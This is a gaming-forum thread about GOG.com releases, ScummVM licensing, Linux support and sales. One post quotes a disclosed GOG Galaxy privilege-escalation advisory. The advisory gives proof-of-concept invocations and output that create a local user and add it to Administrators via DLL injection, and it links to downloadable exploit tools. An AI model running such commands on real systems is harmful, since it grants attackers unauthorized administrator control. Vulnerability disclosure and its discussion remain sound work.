Putting the 'role' back in role-playing games since 2002.
Donate to Codex
Good Old Games
  • Welcome to rpgcodex.net, a site dedicated to discussing computer based role-playing games in a free and open fashion. We're less strict than other forums, but please refer to the rules.

    "This message is awaiting moderator approval": All new users must pass through our moderation queue before they will be able to post normally. Until your account has "passed" your posts will only be visible to yourself (and moderators) until they are approved. Give us a week to get around to approving / deleting / ignoring your mundane opinion on crap before hassling us about it. Once you have passed the moderation period (think of it as a test), you will be able to post normally, just like all the other retards.

GOG.com

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
Leisure Suit Larry reboot for under $10 finally. Yay.

Can't wait to play it in 2035 or so.
 

El Presidente

Arcane
Joined
Nov 3, 2018
Messages
1,546
Location
Oval Office
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Every 6 or so months I type on GOG search "Discworld", "Orion Burger", "Myth" to see if they finally got released, but nope. :negative:

Also Black Dahlia and Dark Colony, which aren't there too.
 

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Classic game releases are more rare now because of licensing issues and shit, so GOG usually makes a big deal about them with a news post. People here then link to the news post, so... you're probably doing fine? Also I wouldn't expect Discworld ever, unless someone like Nightdive puts in a ton of effort and investment. I said the same thing about Blade Runner though and then they did just that, so who knows...
 

Morpheus Kitami

Liturgist
Joined
May 14, 2020
Messages
2,476
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Classic game releases are more rare now because of licensing issues and shit, so GOG usually makes a big deal about them with a news post. People here then link to the news post, so... you're probably doing fine? Also I wouldn't expect Discworld ever, unless someone like Nightdive puts in a ton of effort and investment. I said the same thing about Blade Runner though and then they did just that, so who knows...
Discworld will happen whenever they can steal use SCUMMVM as a shell. DOSbox apparently scares away boomers and SCUMMVM offers a nice, self-contained shell. No futzing around with anything, no weird old computering gibberish. Is it true? Does it matter? It seems most of the time GOG and Steam have SCUMMVM versions whenever possible. I know the people behind the engine are okay with it, but its obvious that some companies are taking advantage of their generosity.
 

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
Discworld will happen whenever they can steal use SCUMMVM as a shell. DOSbox apparently scares away boomers and SCUMMVM offers a nice, self-contained shell. No futzing around with anything, no weird old computering gibberish. Is it true? Does it matter? It seems most of the time GOG and Steam have SCUMMVM versions whenever possible. I know the people behind the engine are okay with it, but its obvious that some companies are taking advantage of their generosity.

Well there's tons of GOG games that use Dosbox, but maybe for Nightdive and such it's a consideration.
 

LESS T_T

Arcane
Joined
Oct 5, 2012
Messages
13,582
Codex 2014
ScummVM is released under GPLv2 which means the companies can use it as long as they release (or link) the source code as well. IIRC Nightdive used ScummVM only for Putt-Putt games re-releases. They can't use it for Blade Runner because GPLv2's "copyleft" policy is not compatible with console release.
 

Ismaul

Thought Criminal #3333
Patron
Joined
Apr 18, 2005
Messages
1,871,807
Location
On Patroll
Codex 2014 PC RPG Website of the Year, 2015 Codex 2016 - The Age of Grimoire Make the Codex Great Again! Grab the Codex by the pussy Insert Title Here RPG Wokedex Strap Yourselves In Codex Year of the Donut Divinity: Original Sin Project: Eternity Torment: Tides of Numenera Shadorwun: Hong Kong Divinity: Original Sin 2 BattleTech A Beautifully Desolate Campaign My team has the sexiest and deadliest waifus you can recruit.

Morpheus Kitami

Liturgist
Joined
May 14, 2020
Messages
2,476
Well there's tons of GOG games that use Dosbox, but maybe for Nightdive and such it's a consideration.
Looking up a few games that can use SCUMMVM, it seems random, even within one series. I guess I could be wrong.
ScummVM is released under GPLv2 which means the companies can use it as long as they release (or link) the source code as well. IIRC Nightdive used ScummVM only for Putt-Putt games re-releases. They can't use it for Blade Runner because GPLv2's "copyleft" policy is not compatible with console release.
True, but that doesn't stop them from doing it with the PC releases. And it sure seems funny that now that SCUMMVM has it working another engine recreation in KEX is happening. Seems to me to be fishy, but that's just me being a big thinker.
 

racofer

Thread Incliner
Joined
Apr 5, 2008
Messages
25,577
Location
Your ignore list.
https://www.positronsecurity.com/blog/2020-08-13-gog-galaxy_client-local-privilege-escalation_deuce/

GOG Galaxy Client Local Privilege Escalation Deuce
By
jtesta
on
August 13, 2020


I reported a serious local privilege escalation flaw in GOG Galaxy Client on April 28, 2020, but my follow-up investigation (detailed below) found the vendor’s fix to be insufficient. By updating the proof-of-concept exploit code, it is possible to execute arbitrary commands as SYSTEM in GOG Galaxy Client v2.0.13 through v2.0.15 v2.0.19 (the latest as of this writing).

GOG did not reply that this issue was officially fixed, although changes were silently made at some point after the v2.0.15 release to stop the provided proof-of-concept tools from working. It is suspected that only minor changes were made to frustrate exploitation; an investigation is ongoing (See update below).

UPDATE (Aug. 13, 2020 @ 5:11PM): After an investigation, it was found that GOG simply updated the signing key used for verifying messages. This key has been recovered, and the proof-of-concept has been updated with it. This advisory now describes a 0-day vulnerability in GOG Galaxy Client v2.0.19 because GOG did not respond in good faith with a proper patch in 90 days, as per Google’s vulnerability disclosure policy (which GOG was made aware of during the initial contact; see Vendor Timeline, below).

Investigation of Prior Patch
The day before issuing my original advisory on April 28, 2020, I ran the proof-of-concept exploits against the fixed versions (v1.2.67 and v2.0.14). They no longer worked. Unfortunately, because GOG never told me the issues were actually fixed on February 27, 2020, I didn’t have a chance to do an in-depth follow-up investigation before publishing the advisory. I’ve since had the chance to look at their fix more deeply.

To start, I looked at the log file at C:\ProgramData\GOG.com\Galaxy\logs\GalaxyClientService.log to see if it reports anything when the old exploit is run. I found this:

2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Received a message from process connected at '127.0.0.1:54963'.
2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Determined sender to be 'C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.7_3.7.2032.0_x64__qbz5n2kfra8p0\python.exe' (PID: 8448)
2020-05-08 15:03:53.503 [Warning][#1 (1)] [TID 7352][galaxy_service]: The sender was not recognized as a trusted client.
2020-05-08 15:03:53.503 [Error][#1 (1)] [TID 7352][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.

That’s a big hint! It looks like the privileged process, GalaxyClientService.exe, matches the network client’s source TCP port number with the executable process that opened the socket. That’s how it figures out that the request is coming from the Python interpreter instead of the legitimate client (GalaxyClient.exe).

I immediately thought that this check can be circumvented with DLL injection.

Updating the Proof-of-Concept
Cue hours of re-implementing my Python proof-of-concept in C…

Ok, now I have a DLL that can be injected into GalaxyClient.exe which will issue the same HMAC-512-signed request as before. Let’s test it out:

C:\Users\user1\Desktop>galaxy_dll_inject_privesc.exe --key2 C:\Windows\System32\net.exe "user jtesta Abc*123Lol /add" "C:\\"
Starting GalaxyClientService...
Executing C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe...
PID of new GalaxyClient.exe process: 10296
Injecting DLL...
DLL injected. Waiting up to 30 seconds for pipe server to start...
Connected to pipe server. Sending command, args, and working directory...
Sent. Waiting for response...

Success!

Looks like it worked! Ok, now let’s add this new user to the local Administrators group:

C:\Users\user1\Desktop>galaxy_dll_inject_privesc.exe --key2 C:\Windows\System32\net.exe "localgroup Administrators jtesta /add" "C:\\"
Starting GalaxyClientService...
Executing C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe...
PID of new GalaxyClient.exe process: 8112
Injecting DLL...
DLL injected. Waiting up to 30 seconds for pipe server to start...
Connected to pipe server. Sending command, args, and working directory...
Sent. Waiting for response...

Success!

Let’s verify that this user exists and is part of the Administrators group:

C:\Users\user1\Desktop>net user jtesta
User name jtesta
[...]
Local Group Memberships *Administrators *Users
[...]
The command completed successfully.

SUCCESS!

Proof-Of-Concept Exploit Tools
Pre-compiled binaries and source code for the updated proof-of-concept tools (which work on GOG Galaxy v2.0.13 through v2.0.19) are available here: gog_galaxy_updated_poc_v2.zip (gog_galaxy_updated_poc_v2.zip.sig)

GPG Key: jtesta.asc (9C61 F6A9 A3E9 BCA0 04A6 3C66 E44F 5FD3 B799 916A)

Vendor Contact Timeline
May 12, 2020: Contact with GOG.com Support was made using the same ticket (#535258) as the original advisory.

June 4, 2020: GOG.com Support replied with:

“I was informed that our Developers are working on fixing the issue, but executing the attack requires the machine to be already compromised.”

Because this sounded like GOG was not taking the issue seriously, I responded with:

“It is indeed true that an attacker must have low-privilege access to the machine already. But the problem is that this can be escalated into Administrator rights by abusing the GalaxyClientService software. […] Local privilege escalation (LPE) is a serious vulnerability. GOG customers may install software/games from other untrusted sources without Administrator rights, which normally would protect them from full system compromise. Unfortunately, due to the vulnerabilities I’ve discovered in GalaxyClientService, all user accounts are effectively administrators.”

August 13, 2020: No response received from vendor after 90 days, as per Google’s vulnerability disclosure policy (which GOG was informed of). GOG did not reply with any fix information.

UPDATE (Aug. 13, 2020 @ 5:11PM): After this advisory was publicly released, GOG.com Support responded with:

“Our Developers reevaluated the reported issue and think that it will take them around 3 months to create a solution, because it demands a major design change. Would it be possible to postpone the public release of your findings by 3 months so they have time to implement and test this solution?”

Because this was received after the advisory was already published, the request was deemed moot.


Explanation of 0-Day Exploit Release
(Section added on Aug. 13, 2020 @ 5:11PM)

As of the time of original publication (the morning of August 13), the proof-of-concept tool released worked on v2.0.13 - v2.0.15 only; it did not work on the latest version (v2.0.19) for unknown reasons. Hours later, an investigation revealed that GOG silently updated the message-signing key some time between the release of v2.0.16 and v2.0.19 in order to prevent the exploit from working. This was not a good-faith attempt at addressing the security vulnerability for two reasons:

1.) As my first GOG Galaxy Client advisory clearly showed, secret keys cannot be used to verify messages, since an attacker can easily extract those keys. GOG already knew since January that this would not solve the core design problem.

2.) In private communication on May 12, I made note that I strongly suspected this would require an extensive re-design, and that I would be happy to help (for free) to ensure that a proper & comprehensive fix would be shipped to end users. No response regarding this offer was received (in fact, no response was received at all until the deadline had passed).

Because it reasonably seems that GOG is no longer acting in good-faith regarding this matter, I’ve updated the proof-of-concept again with the new signing key. Hence, as of August 13, this is a 0-day vulnerability affecting GOG Galaxy Client v2.0.19.

What a train wreck. GOG handled this in worst way possible, first with a "make this go away" fix which did not fix anything, then by ignoring the issue until it was made public.
 

Bad Sector

Arcane
Patron
Joined
Mar 25, 2012
Messages
2,223
Insert Title Here RPG Wokedex Codex Year of the Donut Codex+ Now Streaming! Steve gets a Kidney but I don't even get a tag.
Note that this issue requires that you run some other executable which takes advantage of it first - it wont happen just by having GOG Galaxy installed (also note that not running GOG Galaxy wont solve the issue - it is the GOG Galaxy service that allows the escalation). So for this to be a real issue you need to either download lots of random executables from shady places (at which point you play with fire and get burnt, as expected) or you fall victim to a chain of passer-by attacks where you, e.g., visit a site that takes advantage of a browser exploit (be it the site itself or, often more likely, through a compromised ad - assuming you do not have an ad blocker) which causes a payload to enter your PC which itself locates and communicates with the GOG service to run stuff as Administrator (and then does whatever else it wants to do, like installing some background service to encrypt your files for ransom).

If any of the above is not the case (e.g. you have no GOG Galaxy, you do not download and run executables from shady places, you have do not visit said shady places in the first place, you have an ad blocker that would block compromised ads, your browser does not have any exploit that the compromised ad/shady site can take advantage of, etc) then you are not affected by it.
 

cosmicray

Savant
Joined
Jan 20, 2019
Messages
436
Like some developers already said, it is not worth it. The costs to support Linux outweigh any possible profits due to its extremely low user base and higher tech support requirements due to the multitude of Linux environments.
Either way, GOG should have made their client on Linux if they sell Linux games.

Btw, is GOG's integration an open API(or whatever)? Because If it ain't and every store needs to officially go though GOG to have them integrated then it is also decline.
 

Bad Sector

Arcane
Patron
Joined
Mar 25, 2012
Messages
2,223
Insert Title Here RPG Wokedex Codex Year of the Donut Codex+ Now Streaming! Steve gets a Kidney but I don't even get a tag.
Like some developers already said, it is not worth it. The costs to support Linux outweigh any possible profits due to its extremely low user base and higher tech support requirements due to the multitude of Linux environments.

Depends highly on how portable their codebase and tech is and since it also works on macOS which is a very different environment than Windows, i'm going to guess that it is portable.

As for the multitude of Linux environments, this is a non-issue: they can either officially support only a single distribution like Steam does and leave the rest to the community, or they can specify exactly which system-side components their client needs to work (which IMO is the best approach). E.g. they can say "we need Xorg at least version <whatever>, Qt at least version <whichever>, Kernel version <something>" - after all pretty much all desktop oriented distros have more or less the same components, it isn't like writing a program on Red Hat wont work on Debian or Slackware with the right libraries. Distributions just provide preinstalled libraries and applications, they do not change the file formats or use a different kernel ABI or whatever, as long as a distribution has the libraries you need (which you can ask for), your programs will work.
 

infidel

StarInfidel
Developer
Joined
May 6, 2019
Messages
494
Strap Yourselves In
What's a good way of keeping track of retro releases on GOG? The only place I check is this here thread.

Every 6 or so months I type on GOG search "Discworld", "Orion Burger", "Myth" to see if they finally got released, but nope. :negative:

Also Black Dahlia and Dark Colony, which aren't there too.

They have an RSS feed, you know: http://www.gog.com/frontpage/rss
 
Last edited by a moderator:

ADL

Prophet
Joined
Oct 23, 2017
Messages
3,682
Location
Nantucket
Made use of that QuakeCon sale that's ending soon. I don't usually buy games twice but the convenience of having all Todd's broken games pre-patched is worth a couple bucks as someone that frequently hops distros and reinstalls Windows.
yRVKUvD.png

Looking forward to playing Battlespire again. I haven't played that since the late 90s.
 
Last edited:

DalekFlay

Arcane
Patron
Joined
Oct 5, 2010
Messages
14,118
Location
New Vegas
Not gonna pretend I don't own them on GOG too, but prepare for the Codex to bring fire and steel upon you for buying Oblivion and Fallout 3.
 
Unwanted

Horvatii

Unwanted
Joined
Dec 15, 2019
Messages
563
What a train wreck. GOG handled this in worst way possible, first with a "make this go away" fix which did not fix anything, then by ignoring the issue until it was made public.

Its not really a big deal.
The first exploit was serious because the GOG service was not verifying where the command to execute a binary is coming from. So you could theoretically go from Guest to SYSTEM, executing anying a Guest cant and modifying anything, which is baaad, mkay.
But the second exploit is the same as the one Steam wont fix. Reason below.

To start, I looked at the log file at C:\ProgramData\GOG.com\Galaxy\logs\GalaxyClientService.log to see if it reports anything when the old exploit is run. I found this:

2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Received a message from process connected at '127.0.0.1:54963'.
2020-05-08 15:03:53.503 [Information][#1 (1)] [TID 7352][galaxy_service]: Determined sender to be 'C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.7_3.7.2032.0_x64__qbz5n2kfra8p0\python.exe' (PID: 8448)
2020-05-08 15:03:53.503 [Warning][#1 (1)] [TID 7352][galaxy_service]: The sender was not recognized as a trusted client.
2020-05-08 15:03:53.503 [Error][#1 (1)] [TID 7352][galaxy_service]: Received a forbidden request from an untrusted sender. Disconnecting.

That’s a big hint! It looks like the privileged process, GalaxyClientService.exe, matches the network client’s source TCP port number with the executable process that opened the socket. That’s how it figures out that the request is coming from the Python interpreter instead of the legitimate client (GalaxyClient.exe).

I immediately thought that this check can be circumvented with DLL injection.

See, now the GOG service is looking who the sender of the command is. And the hacker ASSUMES that it only checks the tcp port and binary path. But thats not given, without reversing the GOG service. If the GOG service is verying the legitimate GalaxyClient.exe binary (as I guess it does), than the second exploit requires ADMIN privileges. Because you cannot do DLL injection without ADMIN, or rather debug privs on your injector. And once you have ADMIN, you dont need SYSTEM. And thats also the reason Steam wont fix their little hole.

So, the orginal exploit was a nice local priv escalation. The follow up is just crying. Windows' own PsExec.exe tool can elevate from admint to system with -s.
 

racofer

Thread Incliner
Joined
Apr 5, 2008
Messages
25,577
Location
Your ignore list.
I usually check the financial reports from CD Projekt. They are available quarterly at their website for anyone to check: https://www.cdprojekt.com/en/investors/result-center/

Here is one interesting bit this year:
KhhAUQo.png


Look at these fat, yummy numbers:
ZQVuz92.png


CD Projekt stronk!

I would be curious to know the numbers from Steam during this pandemic, but since they are not publicly traded there is no way to know.
 

Rahdulan

Omnibus
Patron
Joined
Oct 26, 2012
Messages
5,105
GOG is really working on a thin profit margin. I guess pursuing all those potential games to secure the rights to sell on GOG makes for killer operating costs.
 

As an Amazon Associate, rpgcodex.net earns from qualifying purchases.
Back
Top Bottom